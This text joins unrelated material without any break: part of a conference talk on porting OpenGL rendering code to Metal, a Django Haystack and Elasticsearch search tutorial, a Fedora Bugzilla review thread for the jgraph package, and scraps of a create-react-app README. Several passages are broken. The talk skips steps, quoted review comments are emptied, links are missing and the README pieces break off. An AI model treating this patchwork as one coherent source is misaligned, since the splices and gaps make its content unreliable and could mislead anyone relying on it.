On a CI server you will usually want to run the tests once instead of starting the watcher:

CI=true npm test

This way Jest will run the tests once and finish the process instead of launching the watcher.
Disabling jsdom
By default, the package.json of the generated project looks like this:

// ...
"scripts": {
  // ...
  "test": "react-scripts test --env=jsdom"
}
If you know that none of your tests depend on jsdom, you can safely remove --env=jsdom, and your tests will run faster.
Something Missing?
If you have ideas for more “How To” recipes that should be on this page, let us know or contribute some!
|
https://azure.microsoft.com/es-es/resources/samples/powerbi-react-client/
|
CC-MAIN-2018-30
|
refinedweb
| 352
| 66.13
|
In 2011, at the 25th National Conference on Artificial Intelligence. AAAI, Daniel Harabor and Alban Grastien presented their paper "Online Graph Pruning for Pathfinding on Grid Maps". This article explains the Jump Point Search algorithm they presented, a pathfinding algorithm that is faster than A* for uniform cost grids that occur often in games.
What to know before reading
This article assumes you know what pathfinding is. As the article builds on A* knowledge, you should also know the A* algorithm, including its details around traveled and estimated distances, and open and closed lists. The References section lists a few resources you could study.
The A* algorithm
The A* algorithm aims to find a path from a single start to a single destination node. The algorithm cleverly exploits the single destination by computing an estimate of how far you still have to go. By adding the already traveled and the estimated distances together, it expands the most promising paths first. If your estimate is never larger than the real length of the remaining path, the algorithm guarantees that the returned path is optimal.
This grid is an example of a uniform cost grid. Traveling a rectangle horizontally or vertically has a distance of 1, traveling diagonally to a neighbour has length sqrt(2). (The code uses 10/2 and 14/2 as relative approximation.) The distance between two neighbouring nodes in the same direction is the same everywhere. A* performs quite badly with uniform cost grids.
Every node has eight neighbours. All those neighbours are tested against the open and closed lists. The algorithm behaves as if each node is in a completely separate world, expanding in all directions, and storing every node in the open or closed list. In other words, every explored rectangle in the picture above has been added to the closed list.
Many of them also have been added to the open list at some point in time. While A* 'walks' towards the end node, the traveled path gets longer and the estimated path gets shorter. There are however in general a lot of feasible parallel paths, and every combination is examined and stored.
In the figure, the shortest path between the left starting point and the right destination point is any sequence of right-up diagonal or right steps, within the area of the two yellow lines, for example the green path. As a result, A* spends most of its time in handling updates to the open and closed lists, and is very slow on big open fields where all paths are equal.
Jump point search algorithm
The JPS algorithm improves on the A* algorithm by exploiting the regularity of the grid. You don't need to search every possible path, since all paths are known to have equal costs. Similarly, most nodes in the grid are not interesting enough to store in an open or closed list. As a result, the algorithm spends much less time on updating the open and closed lists. It potentially searches larger areas, but the authors claim the overall gain is still much better due to spending less time updating the open and closed lists.
This is the same search as before with the A* algorithm. As you can see you get horizontal and vertical searched areas, which extend to the next obstacle. The light-blue points are a bit misleading though, as JPS often stacks several of them at the same location.
The algorithm
The JPS algorithm builds on the A* algorithm, which means you still have an estimate function, and open and closed lists. You also get the same optimality properties of the result under the same conditions. It differs in the data in the open and closed lists, and how a node gets expanded. The paper discussed here finds paths in 2D grids with grid cells that are either passable or non-passable. Since this is a common and easy to explain setup, this article limits itself to that as well. The authors have published other work since 2011 with extensions which may be interesting to study if your problem is different from the setup used here.
Having a regular grid means you don't need to track precise costs every step of the way. It is easy enough to compute it when needed afterwards. Also, by exploiting the regularity, there is no need to expand in every direction from every cell, and have expensive lookups and updates in the open and closed lists with every cell like A* does. It is sufficient to only scan the cells to check if there is anything 'interesting' nearby (a so-called jump point). Below, a more detailed explanation is given of the scanning process, starting with the horizontal and vertical scan. The diagonal scan is built on top of the former scans.
Horizontal and vertical scan
Horizontal (and vertical) scanning is the simplest to explain. The discussion below only covers horizontal scanning from left to right, but the other three directions are easy to derive by changing scanning direction, and/or substituting left/right for up/down.
The (A) picture shows the global idea. The algorithms scans a single row from left to right. Each horizontal scan handles a different row. In the section about diagonal scan below, it will be explained how all rows are searched.
At this time, assume the goal is to only scan the b row, rows a and c are done at some other time. The scan starts from a position that has already been done, in this case b1. Such a position is called a parent. The scan goes to the right, as indicated by the green arrow leaving from the b1 position. The (position, direction) pair is also the element stored in open and closed lists. It is possible to have several pairs at the same position but with a different direction in a list.
The goal of each step in the scan is to decide whether the next point (b2 in the picture) is interesting enough to create a new entry in the open list. If it is not, you continue scanning (from b2 to b3, and further). If a position is interesting enough, new entries (new jump points) are made in the list, and the current scan ends.
Positions above and below the parent (a1 and c1) are covered already due to having a parent at the b1 position; these can be ignored. In the [A] picture, position b2 is in open space, the a and c rows are handled by other scans, nothing to see here, we can move on [to b3 and further]. The [B] picture is much the same.
The a row is non-passable, the scan at the a row has stopped before, but that is not relevant while scanning the b row.
The [C] picture shows an 'interesting' situation. The scan at the a row has stopped already due to the presence of the non-passable cell at a2 [or earlier]. If we just continue moving to the right without doing anything, position a3 would not be searched. Therefore, the right action here is to stop at position b2, and add two new pairs to the open list, namely (b2, right) and (b2, right-down) as shown in picture [D]. The former makes sure the horizontal scan is continued if useful, the latter starts a search at the a3 position (diagonally down).
After adding both new points, this scan is over and a new point and direction is selected from the open list. The row below is not the only row to check. The row above is treated similarly, except 'down' becomes 'up'.
Two new points are created when c2 is non-passable and c3 is passable. (This may happen at the same time as a2 being non-passable and a3 being passable. In that case, three jump points will be created at b2, for directions right-up, right, and right-down.)
Last but not least, the horizontal scan is terminated when the scan runs into a non-passable cell, or reaches the end of the map. In both cases, nothing special is done, besides terminating the horizontal scan at the row.
Code of the horizontal scan
def search_hor(self, pos, hor_dir, dist): """ Search in horizontal direction, return the newly added open nodes @param pos: Start position of the horizontal scan. @param hor_dir: Horizontal direction (+1 or -1). @param dist: Distance traveled so far. @return: New jump point nodes (which need a parent). """ x0, y0 = pos while True: x1 = x0 + hor_dir if not self.on_map(x1, y0): return [] # Off-map, done. g = grid[x1][y0] if g == OBSTACLE: return [] # Done. if (x1, y0) == self.dest: return [self.add_node(x1, y0, None, dist + HORVERT_COST)] # Open space at (x1, y0). dist = dist + HORVERT_COST x2 = x1 + hor_dir nodes = [] if self.obstacle(x1, y0 - 1) and not self.obstacle(x2, y0 - 1): nodes.append(self.add_node(x1, y0, (hor_dir, -1), dist)) if self.obstacle(x1, y0 + 1) and not self.obstacle(x2, y0 + 1): nodes.append(self.add_node(x1, y0, (hor_dir, 1), dist)) if len(nodes) > 0: nodes.append(self.add_node(x1, y0, (hor_dir, 0), dist)) return nodes # Process next tile. x0 = x1
Coordinate (x0, y0) is the parent position, x1 is next to the parent, and x2 is two tiles from the parent in the scan direction. The code is quite straightforward.
After checking for the off-map and obstacle cases at x1, the non-passable and passable checks are done, first above the y0 row, then below it. If either case adds a node to the nodes result, the continuing horizontal scan is also added, and all nodes are returned. The code of the vertical scan works similarly.
Diagonal scan
The diagonal scan uses the horizontal and vertical scan as building blocks, otherwise, the basic idea is the same. Scan the area in the given direction from an already covered starting point, until the entire area is done or until new jump points are found.
The scan direction explained here is diagonally to the right and up. Other scan directions are easily derived by changing 'right' with 'left', and/or 'up' with 'down'. Picture [E] shows the general idea.
Starting from position a1, the goal is to decide if position b2 is a jump point. There are two ways how that can happen. The first way is if a2 (or b1) itself is an 'interesting' position. The second way is if up or to the right new jump points are found.
The first way is shown in picture [F]. When position b1 is non-passable, and c1 is passable, a new diagonal search from position b2 up and to the left must be started. In addition, all scans that would be otherwise performed in the diagonal scan from position a1 must be added. This leads to four new jump points, as shown in picture [G].
Note that due to symmetry, similar reasoning causes new jump points for searching to the right and down, if a2 is non-passable and a3 is passable. (As with the horizontal scan, both c1 and a3 can be new directions to search at the same time as well.) The second way of getting a jump point at position b2 is if there are interesting points further up or to the right.
To find these, a horizontal scan to the right is performed starting from b2, followed by a vertical scan up from the same position. If both scans do not result in new jump points, position b2 is considered done, and the diagonal scan moves to examining the next cell at c3 and so on, until a non-passable cell or the end of the map.
Code of the diagonal scan
def search_diagonal(self, pos, hor_dir, vert_dir, dist): """ Search diagonally, spawning horizontal and vertical searches. Returns newly added open nodes. @param pos: Start position. @param hor_dir: Horizontal search direction (+1 or -1). @param vert_dir: Vertical search direction (+1 or -1). @param dist: Distance traveled so far. @return: Jump points created during this scan (which need to get a parent jump point). """ x0, y0 = pos while True: x1, y1 = x0 + hor_dir, y0 + vert_dir if not self.on_map(x1, y1): return [] # Off-map, done. g = grid[x1][y1] if g == OBSTACLE: return [] if (x1, y1) == self.dest: return [self.add_node(x1, y1, None, dist + DIAGONAL_COST)] # Open space at (x1, y1) dist = dist + DIAGONAL_COST x2, y2 = x1 + hor_dir, y1 + vert_dir nodes = [] if self.obstacle(x0, y1) and not self.obstacle(x0, y2): nodes.append(self.add_node(x1, y1, (-hor_dir, vert_dir), dist)) if self.obstacle(x1, y0) and not self.obstacle(x2, y0): nodes.append(self.add_node(x1, y1, (hor_dir, -vert_dir), dist)) hor_done, vert_done = False, False if len(nodes) == 0: sub_nodes = self.search_hor((x1, y1), hor_dir, dist) hor_done = True if len(sub_nodes) > 0: # Horizontal search ended with a jump point. pd = self.get_closed_node(x1, y1, (hor_dir, 0), dist) for sub in sub_nodes: sub.set_parent(pd) nodes.append(pd) if len(nodes) == 0: sub_nodes = self.search_vert((x1, y1), vert_dir, dist) vert_done = True if len(sub_nodes) > 0: # Vertical search ended with a jump point. pd = self.get_closed_node(x1, y1, (0, vert_dir), dist) for sub in sub_nodes: sub.set_parent(pd) nodes.append(pd) if len(nodes) > 0: if not hor_done: nodes.append(self.add_node(x1, y1, (hor_dir, 0), dist)) if not vert_done: nodes.append(self.add_node(x1, y1, (0, vert_dir), dist)) nodes.append(self.add_node(x1, y1, (hor_dir, vert_dir), dist)) return nodes # Tile done, move to next tile. x0, y0 = x1, y1
The same coordinate system as with the horizontal scan is used here as well. (x0, y0) is the parent position, (x1, y1) is one diagonal step further, and (x2, y2) is two diagonal steps. After map boundaries, obstacle, and destination-reached checking, first checks are done if (x1, y1) itself should be a jump point due to obstacles. Then it performs a horizontal scan, followed by a vertical scan. Most of the code is detection that a new point was created, skipping the remaining actions, and then creating new jump points for the skipped actions. Also, if jump points got added in the horizontal or vertical search, their parent reference is set to the intermediate point. This is discussed further in the next section.
Creating jump points
Creating jump points at an intermediate position, such as at b2 when the horizontal or vertical scan results in new points, has a second use. It's a record of how you get back to the starting point. Consider the following situation:
Here, a diagonal scan started at a1. At b2 nothing was found. At c3, the horizontal scan resulted in new jump points at position c5. By adding a jump point at position c3 as well, it is easy to store the path back from position c5, as you can see with the yellow line. The simplest way is to store a pointer to the previous (parent) jump point. In the code, I use special jump points for this, which are only stored in the closed list (if no suitable node could be found instead) by means of the get_closed_node method.
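As a sketch (assuming the jump points store pos and parent attributes, as in the attached program), recovering the final path is then just a walk along the parent chain:

def path_to_start(node):
    """Walk the stored parent pointers from the destination jump point
    back to the starting point, then reverse the result."""
    path = []
    while node is not None:
        path.append(node.pos)
        node = node.parent
    path.reverse()
    return path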
Starting point
Finally, a small note about the starting point. In all the discussion before, the parent was at a position which was already done. In addition, scan directions make assumptions about other scans covering the other parts. To handle all these requirements, you first need to check the starting point is not the destination. Secondly, make eight new jump points, all starting from the starting position but in a different direction. Finally pick the first point from the open list to kick off the search.
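In code, the seeding step looks roughly like this (a sketch using the same add_node helper as the scans above):

def start_search(self, start, dest):
    # Trivial case: we are already at the destination.
    if start == dest:
        return
    # Seed the open list with all eight directions from the start.
    for hor_dir in (-1, 0, 1):
        for vert_dir in (-1, 0, 1):
            if (hor_dir, vert_dir) != (0, 0):
                self.add_node(start[0], start[1], (hor_dir, vert_dir), 0)
    # The main loop then repeatedly picks the best node from the open list.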
Performance
I haven't done real performance tests; there is an elaborate discussion of them in the original paper. However, the test program prints some statistics about the lists.
Dijkstra: open queue = 147 Dijkstra: all_length = 449 A*: open queue = 91 A*: all_length = 129 JPS: open queue = 18 JPS: all_length = 55
The open/closed list implementation is a little different. Rather than moving an entry from the open to the closed list when picking it from the open list, it gets added to an overall list immediately. This list also knows the best found distance for each point, which is used in the decision whether a new point should also be added to the open list as well. The all_length list is thus open + closed together.
To get the length of the closed list, subtract the length of the open list. For the JPS search, a path back to the originating node is stored in the all_length list as well (by means of the get_closed_node). This costs 7 nodes.
As you can see, the Dijkstra algorithm uses a lot of nodes in the lists. Keep in mind however that it determines the distance from the starting point to each node it visits. It thus generates a lot more information than either A* or JPS. Comparing A* and JPS, even in the twisty small area of the example search, JPS uses less than half as many nodes in total. This difference increases as the open space gets bigger, since A* adds a node for each explored point while JPS only adds new nodes if it finds new areas behind a corner.
References
The Python3 code is attached to the article. Its aim is to show all the missing pieces of support code from the examples I gave here. It does not produce nifty-looking pictures.

Dijkstra algorithm (not discussed, but a worthy read)
- (Article at Gamedev)
A* algorithm
- (Article at Gamedev)
JPS algorithm
- (Wikipedia on JPS)
- (Published article) harabor-grastien-aaai11.pdf
Versions
- 20151024 First release
I’ve mentioned r/dailyprogrammer in previous posts, since I think they are fun little problems to solve when I have time on my hands. They’re also great problem sets to do when learning a new language.
This time around I decided to do an easy one with haskell.
Nuts and bolts problem description
The goal is stated as:
You have just been hired at a local home improvement store to help compute the proper costs of inventory. The current prices are out of date and wrong; you have to figure out which items need to be re-labeled with the correct price.
You will be first given a list of item-names and their current price. You will then be given another list of the same item-names but with the correct price. You must then print a list of items that have changed, and by how much.
The formal inputs and outputs: for every item whose price changed, print the item name followed by the price difference, prefixed with '+' for a growth in price or '-' for a loss in price. Order does not matter for output.
And the sample input/output:
Sample Input 1
4
CarriageBolt 45
Eyebolt 50
Washer 120
Rivet 10
CarriageBolt 45
Eyebolt 45
Washer 140
Rivet 10
Sample Output 1
Eyebolt -5
Washer +20
My haskell solution
And here is my haskell solution
[haskell]
module Temp where

import Control.Monad
import Data.List

data Item = Item { name :: String, price :: Integer }
    deriving (Show, Read, Ord, Eq)

strToLine :: String -> Item
strToLine str = Item name (read price)
  where
    name:price:_ = words str

formatPair :: (Item, Item) -> [Char]
formatPair (busted, actual) = format
  where
    diff = price actual - price busted
    direction = if diff > 0 then "+" else "-"
    format = name busted ++ " " ++ direction ++ show (abs diff)

getPairs :: IO [(Item, Item)]
getPairs = do
    n <- readLn
    let readGroup = fmap (sort . map strToLine) (replicateM n getLine)
    old <- readGroup
    new <- readGroup
    let busted = filter (\(a,b) -> a /= b) $ zip old new
    return $ busted

printPairs :: IO [(Item, Item)] -> IO [String]
printPairs pairs = fmap (map formatPair) pairs
[/haskell]
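For completeness, here is one way to wire this into a runnable program (not part of the solution above; it assumes the module is built as Main, e.g. with GHC's -main-is Temp):

[haskell]
main :: IO ()
main = printPairs getPairs >>= mapM_ putStrLn
[/haskell]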
I had a lot of fun with this one, since it really forced me to understand and utilize fmap, given that you had to deal with being in the IO monad. I also liked being “forced” to separate the IO from the pure. I say forced in quotes because it's really not that helpful to do all your work in the IO function; it's not reusable.
Also I found that by sticking to strongly typed data I had a more difficult time than if I had just leveraged the fact that the input was really a key value pair. However, the engineer in me knows that things could change, and I hate taking shortcuts. By strongly typing the input data and separating out the parsing function from the code that does filtering and formatting, we could extend the problem set to include other fields without having to jump back to the IO code.
Anyways, things are getting easier with haskell, but I’m still struggling with leveraging all the available libraries and constructs. I guess that just comes with time and practice.
date_part
When you use this function in a query, it extracts the specified part of the date values in the given column of the specified dataset, based on the value passed in the params parameter.
The allowed values are as follows:
- second
- minute
- hour
- day
- dayofweek
- dayofyear
- week
- month
- year
- quarter
- decade
For more information on using query functions and operators in a REST API request, see Queries. For an end-to-end description of how to create a query, see Creating a Query.
{ "version": 0.3, "dataset": "90af668484394fa782cc103409cafe39", "namespace": { "date_extraction": { "source": ["datetime"], "apply": [{ "fn": "date_part", "type": "transform", "params": ["month"] }] } }, "metrics": ["date_extraction"], }
When you submit the above request, the response includes an HTTP status code and a JSON response body.
For more information on the HTTP status codes, see HTTP Status Codes.
For more information on the elements in the JSON structure in the response body, see Query.
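As a further illustration (same structure as the request above, with only the params value changed to another allowed value), extracting the year instead of the month would look like this:

{
    "version": 0.3,
    "dataset": "90af668484394fa782cc103409cafe39",
    "namespace": {
        "date_extraction": {
            "source": ["datetime"],
            "apply": [{
                "fn": "date_part",
                "type": "transform",
                "params": ["year"]
            }]
        }
    },
    "metrics": ["date_extraction"]
}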
Created on 2008-11-30 16:23 by lcatucci, last changed 2016-09-08 14:38 by christian.heimes.
The enclosed patch does three things:
1. enables SMTP_SSL to work: the _get_socket method was setting
self.sock instead of returning the socket to the caller, which
did reset self.sock to None
2. replace home-grown SSLFakeFile() with calls to ssl.socket's makefile()
calls both in the starttls and in the SMTP_SSL cases
3. shutdown sockets before closing them, to avoid server-side piling and
connection refused on connection-limited servers
The last change is just a cosmetic refactoring, but it really helps the SMTP_SSL case: default_port should really be a class attribute, instead of being set at __init__ time.
I've reworked the patch into a series, like haypo requested for
poplib and imaplib.
With the closure of 4066 all the tests in the test patch pass, so I'm lowering the priority of this ticket.
I haven't reviewed the other patches, but the tests in the test patch
appear to be doing tests in the setup method, which doesn't seem like a
good idea.
I still have to apply Catucci's patch (or a modification of) after every Ubuntu installation or upgrade. Otherwise, I get
...
File "/usr/lib/python2.7/smtplib.py", line 752, in __init__
SMTP.__init__(self, host, port, local_hostname, timeout)
File "/usr/lib/python2.7/smtplib.py", line 239, in __init__
(code, msg) = self.connect(host, port)
File "/usr/lib/python2.7/smtplib.py", line 295, in connect
self.sock = self._get_socket(host, port, self.timeout)
File "/usr/lib/python2.7/smtplib.py", line 757, in _get_socket
new_socket = socket.create_connection((host, port), timeout)
File "/usr/lib/python2.7/socket.py", line 571, in create_connection
raise err
socket.error: [Errno 111] Connection refused
But shouldn't #4066 have solved the critical part of this issue pair 4066/4470?
Torsten, can you provide a clear, failing unittest for this?
No, I don't know how to do that. All I can provide is a minimal version of my code that triggers the above mentioned traceback. It is:
import smtplib
s = smtplib.SMTP_SSL("relay-auth.rwth-aachen.de")
s.login("***", "***")
s.sendmail("bronger@physik.rwth-aachen.de", "bronger.randys@googlemail.com"], "Hello")
I hope it helps to understand what I mean.
Sorry, it must be:
import smtplib
s = smtplib.SMTP_SSL("relay-auth.rwth-aachen.de")
s.login("***", "***")
s.sendmail("bronger@physik.rwth-aachen.de", ["bronger.randys@googlemail.com"], "Hello")
(A bracket was missing.)
According to your traceback you should be seeing the error in the first line (the creation of the SMTP_SSL object). If I run that line at the python prompt of python2.7.1, I get your connection failure. If I run it using 2.7 tip (or 3.3 tip), the connection succeeds. I know there have been other fixes in this area, but I don't know which one makes the difference.
Torsten, can you test with 2.7.2 and/or 2.7 tip?
I'm not sure what is left to do in this issue. Do you have an opinion, Lorenzo?
On Fri, 17 Jun 2011, R. David Murray wrote:
RDM>
RDM> R. David Murray <rdmurray@bitdance.com> added the comment:
RDM>
RDM> According to your traceback you should be seeing the error in the
RDM> first line (the creation of the SMTP_SSL object). If I run that line
RDM> at the python prompt of python2.7.1, I get your connection failure.
RDM> If I run it using 2.7 tip (or 3.3 tip), the connection succeeds. I
RDM> know there have been other fixes in this area, but I don't know which
RDM> one makes the difference.
RDM>
RDM> Torsten, can you test with 2.7.2 and/or 2.7 tip?
RDM>
RDM> I'm not sure what is left to do in this issue. Do you have an
RDM> opinion, Lorenzo?
RDM>
Torsten, would you mind letting us know both the python and the .deb
version by running
$ python2.7 --version
and
$ dpkg -l python2.7
At least in debian's python2.7_2.7.1-8, default_port is still an instance
attribute instead of a class attribute.
If the ubuntu situation is the same, the missing patch is
smtplib_01_default_port.diff , and you could work-around the problem by
explicitly calling s = smtplib.SMTP_SSL("relay-auth.rwth-aachen.de", 465).
The patch got in with:
changeset: 69931:bcf04ced5ef1
branch: 2.7
parent: 69915:7c3a20b5943a
user: Antoine Pitrou <solipsis@pitrou.net>
date: Sat May 07 19:59:33 2011 +0200
summary: Issue #11927: SMTP_SSL now uses port 465 by default as
documented. Patch by Kasun Herath.
The last hunk, which fixes LMTP is still missing.
@@ -776,8 +777,9 @@
     authentication, but your mileage might vary."""
     ehlo_msg = "lhlo"
+    default_port = LMTP_PORT
-    def __init__(self, host = '', port = LMTP_PORT, local_hostname = None):
+    def __init__(self, host = '', port = 0, local_hostname = None):
         """Initialize a new instance."""
         SMTP.__init__(self, host, port, local_hostname)
Have a nice week-end, yours
lorenzo
Most of the problems in this issue were solved already so it could almost be closed:
* patch 1 was addressed in #11927
* patch 2 was addressed in #4066
* patches 3 and 4 were addressed in #11893
Torsten's problem was addressed by bcf04ced5ef1.
> I'm not sure what is left to do in this issue.
The only patch remaining is patch 5. I attached an updated version against tip of default branch. My patch mimics shutdown in imaplib.py in that it silences ENOTCONN. However I don't have a test that fails without the shutdown and I don't know if checking ENOTCONN is really needed. I tried to get shutdown to produce ENOTCONN by using Postfix as a server with smtpd_timeout=5s, connecting to it and waiting idle for more than 5 seconds before doing close(). In the Postfix logs I see that Postfix disconnects after 5 seconds of inactivity but doing shutdown afterwards doesn't trigger any exception so the ENOTCONN part remains unexercised.
My patch also adds shutdown method and SHUT_RDWR constant to mock_socket.py since otherwise test_smtplib fails.
(Added Antoine to nosy because he reviewed the patches for #11927 and #11893)
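(For illustration, a minimal sketch of the shutdown-then-close pattern patch 5 describes, silencing ENOTCONN as imaplib does; this is not the exact diff:)

import errno
import socket

def close(self):
    sock, self.sock = self.sock, None
    if sock is not None:
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except socket.error as e:
            # the server may already have dropped the connection
            if e.errno != errno.ENOTCONN:
                raise
        finally:
            sock.close()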
My Python version is "Python 2.7.1+" and the package is called "python2.7 2.7.1-5ubuntu2" (Ubuntu Natty).
Just finished testing both 2.7 and default branches' socket close behaviour, and it seems 05 is not strictly needed.
I'd still prefer if smtplib_05_shutdown_socket_v2.patch could get in, since this way the REMOTE socket close will be unconditionally correct, instead of being dependent on GC artifacts.
For five Ubuntu releases now, I apply this patch. In contrast to Catalin's statement, it is not solved for me unless the upstream changes of two years ago haven't yet found their way into Ubuntu. I'm currently using Python 2.7.4 on Ubuntu 13.04. That said, the patch solves my issue every time.
When you say "I apply this patch", you mean smtplib_05_shutdown_socket_v2.patch, right?
In any case, I'm growing wary of bugfix regressions right now, so I would only apply the patch on the default branch.
Sorry, after having had another look at it, I realised that I have a different SSMTP issue now, non-Python-related. So for me, Ubuntu 13.04 indeed solves my old issue.
Lorenzo, any chance you could supply a unit test that fails without smtplib_05_shutdown_socket.diff applied?
It would really be a functional test, since the problem with half-open
connection pile-up stems from smtp server's access control rules.
To test we should setup a fake smtp server, which forbids having multiple
connections from the same IP address, and connect twice in a row to the
fake server. I'm not sure I'm able to implement both an smtpd.py server
serving more than one connection and the client code in a race-free way in
the same "unit" test. Will try in the next week.
Thank you very much,
lorenzo
The bug is 8 years old and hasn't seen activity for three years. Is SMTP over SSL still broken for you?
Write a Python program to generate a random number (float) between 0 and n. To work with the following functions, we have to import the random module.
Remember, the outputs shown below may be different from what you get, because these Python number functions generate random numbers every time you call them.
Python random number between 0 and 1
The random() function generates a number between 0 and 1, and the data type will be float. So the below Python number generator example returns a random floating-point number from 0 (inclusive) up to, but not including, 1.
import random

rnum = random.random()
print(rnum)
0.9625965525945374
Python random integer in a range
The randint() function takes two arguments: the first is the start value and the second is the stop value, and both ends are inclusive. For the original task, the start is 0 and the stop is n.
If you want to generate a number in a range that does not begin at 0, just pass a different start value. For instance, the code below returns a number between 10 and 100.
import random as rnd

rnum = rnd.randint(10, 100)
print(rnum)
70
The randrange() function is really helpful when you need to pick from a range of integers. If you pass in a step value, it will only pick a value from the set of integers reached by skipping over that many numbers at a time. In the last statement below, we pass in a step value after the start and stop.
import random as rd

rnum1 = rd.randrange(10)
print(rnum1)

rnum2 = rd.randrange(5, 95)
print(rnum2)

rnum3 = rd.randrange(10, 200, 2)
print(rnum3)
2 61 186
If we use the above functions in combination with a for loop, it is easy to test or simulate with fake data. By default, the range function skips one number at each step, so it doesn't require a step argument; if you want to skip more than one number at each step, pass a step argument (see the sketch after the next example).
The loop below tells the for loop to generate an integer for each iteration, producing ten random numbers between 10 and 100.
We also added an extra print statement to print the number generated at each for loop iteration. With this Python random number generator example, you can understand it better.
import random as rd

rndList = []
for i in range(1, 11):
    rnum = rd.randint(10, 100)
    rndList.append(rnum)
    print(rnum)
print(rndList)
16 23 72 51 63 78 39 47 80 46 [16, 23, 72, 51, 63, 78, 39, 47, 80, 46]
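As promised above, here is a small sketch (not part of the original tutorial) of range with a step argument, which makes the loop skip numbers:

import random as rd

# range(100, 200, 20) yields 100, 120, 140, 160, 180: one random pick per step
for i in range(100, 200, 20):
    print(i, rd.randint(10, 100))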
In the following two examples, we haven't repeated the import line. In order to test the second and third examples, add the import line from above.
Within the second example, we used the Python randrange function along with a for loop.
rndList = []
for i in range(0, 8):
    rnum = rd.randrange(5, 95)
    rndList.append(rnum)
    print(rnum)
print(rndList)
70 62 58 53 44 60 79 73 [70, 62, 58, 53, 44, 60, 79, 73]
In this third example, we again used randint within the for loop, this time printing the loop counter next to each generated number.
rndList = []
for i in range(1, 11):
    rnum = rd.randint(10, 100)
    rndList.append(rnum)
    print(i, " = ", rnum)
print(rndList)
1 = 46 2 = 28 3 = 95 4 = 53 5 = 55 6 = 68 7 = 70 8 = 94 9 = 65 10 = 95 [46, 28, 95, 53, 55, 68, 70, 94, 65, 95]
Python random number between 1 and 10
The Python random module includes a sample() function that allows you to select one or more elements from a list or a tuple: pass in a sequence, along with a sample size (how many elements to sample). If you only need a single element, use the choice() function instead (a quick sketch follows the next example).
sample() returns a list of elements taken from the sequence. For example, the program below returns eight distinct numbers between 1 and 9 (the stop value of range is exclusive).
import random as rnd

rndList = rnd.sample(range(1, 10), 8)
print(rndList)
[2, 4, 1, 5, 7, 8, 6, 3]
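The choice() function mentioned above is not shown in the original examples, so here is a minimal sketch:

import random as rnd

# choice() returns exactly one element from the given sequence
print(rnd.choice([1, 2, 3, 4, 5, 6, 7, 8, 9, 10]))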
Finally, we allow users to enter the start and stop values and generate numbers between those values using the different functions covered above.
import random as rd

s = int(input("Please enter the Starting Value = "))
e = int(input("Please enter the Ending Value = "))

rnum1 = rd.randint(s, e)
print("using randint = ", rnum1)

rnum2 = rd.randrange(s, e)
print("using randrange = ", rnum2)

rndList = rd.sample(range(s, e), 7)
print("List using sample = ", rndList)

rndList1 = []
rndList2 = []
for i in range(0, 7):
    rnum3 = rd.randint(s, e)
    rndList1.append(rnum3)
    rnum4 = rd.randrange(s, e)
    rndList2.append(rnum4)
print("List using randint = ", rndList1)
print("List using randrange = ", rndList2)
Marzipan
What is Marzipan?
Marzipan is a technology that makes it easier to run managed (.NET) code in your native Mac (Cocoa) applications by embedding Mono.
Marzipan is in early development, and was mainly conceived due to the need to host Mono and the managed compiler inside Fire, a project currently under development here at RemObjects. Marzipan is made to do exactly what is needed by Fire, and not much more. That said, it is usable, and we want to make it available for everyone to use. Feedback and contributions are appreciated, and we plan to improve this project moving forward.
Background
Mono is made for embedding, but traditionally, interaction between the native and managed side has been clumsy, with an awkward C-based API. Marzipan fixes this by providing wrapper classes that allow you to (a) interact with the Mono runtime using object oriented APIs and, more importantly, (b) interact with your own classes directly.
Marzipan comes in two parts. Part one is a native Cocoa library you can link into your app that makes it easy to embed Mono, launch up an instance of the Mono runtime, and also takes care of a lot of the background tasks for making everything work. Part two is a code generator that takes your managed .dlls and a small config file that describes what classes you want to expose and generates Cocoa source files for wrapper classes you can use in your native app.
Right now, this second part generates Oxygene or RemObjects C# code, but eventually, we will expand it to support generating Objective-C and Swift code as well.
Requirements
The following requirements exist to run and use Marzipan:
- a 64-bit version of Mono to be either installed globally on the Mac or embedded into your .app (the latter requires a bit of manual work, described below)
- Elements (because as mentioned above, we currently only generate Elements code, no Objective-C or Swift)
Note that currently, Mono only ships as a 32-bit version. Since you're most likely (especially if you're using Elements) building 64-bit Mac apps, you will need to manually build Mono for 64-bit. It's pretty easy, and described here, but it comes down to four simple command line steps to run in Terminal after you check out mono from git (replace "someplace" with a path of your choice):
./autogen.sh --prefix=/someplace/Mono --disable-nls
make
make install
install_name_tool -id @loader_path/../Frameworks/libmono-2.0.dylib /someplace/Mono/lib/libmono-2.0.dylib
The last part is only needed if you want to later embed Mono into your .app bundle (which is recommended if you actually want to ship your app to users without them needing to have Mono installed themselves).
Importing
The next step is to have some .dll(s) with managed code that you want to expose to your native app, and to create a small .xml config file that describes what you want to export. Note that Marzipan is pretty good at marshaling stuff, but there are limitations to what it can do. In general, most classes that don't do anything too awkward should export fine and be usable. If your classes expose other classes as properties (or expect them as parameters), make sure to include all those classes in your export config. Any class not exported by Marzipan will be shown as a black-box MZObject type when used as a parameter or result.
An example XML config looks something like this (this is taken from Fire):
<?xml version="1.0" encoding="utf-8"?>
<import>
  <namespace>RemObjects.Fire.ManagedWrapper</namespace>
  <outputfilename>FireManagedWrapper\ImportedAPI.pas</outputfilename>
  <outputtype>Oxygene</outputtype>
  <libraries>
    <library>..\..\Bin\RemObjects.Oxygene.Tools.dll</library>
    <library>..\..\Bin\RemObjects.Oxygene.dll</library>
    <library>..\..\Bin\RemObjects.Oxygene.Fire.ManagedHelper.dll</library>
    ...
  </libraries>
  <types>
    <type>
      <name>RemObjects.Oxygene.Fire.ManagedHelper.LogLevel</name>
    </type>
    <type>
      <name>RemObjects.Oxygene.Fire.ManagedHelper.XBuilder</name>
    </type>
    <type>
      <name>RemObjects.Oxygene.Code.Compiler.CodeCompletionCompiler</name>
    </type>
    ...
  </types>
</import>
Essentially, you specify the namespace and language type; valid right now are “Oxygene” and “Hydrogene” (for RemObjects C#) to use at the top, followed by the list of .dlls and then the list of types. It does not matter what language or compiler those .dlls were compiled with, as long as they are pure IL assemblies.
You then run MarzipanImporter.exe against this file (you can run it using mono MarzipanImporter.exe on the Mac, if you wish), and the result will be a .pas or .cs file with Cocoa wrappers for all the classes and types you specified.
Don’t worry about the details of the implementation for these classes — they will look pretty messy, because they do a lot of C-level API fiddling to hook everything up. What matters is the public API of these classes — and you should see all your methods and properties.
You can now add this file to your Mac .app project, add a reference to libMarzipan, and you're ready to use it.
Using Marzipan
Start by adding "RemObjects.Marzipan" to your uses/using clause (or importing it, or including the respective libMarzipan.h header file in Swift or Objective-C).
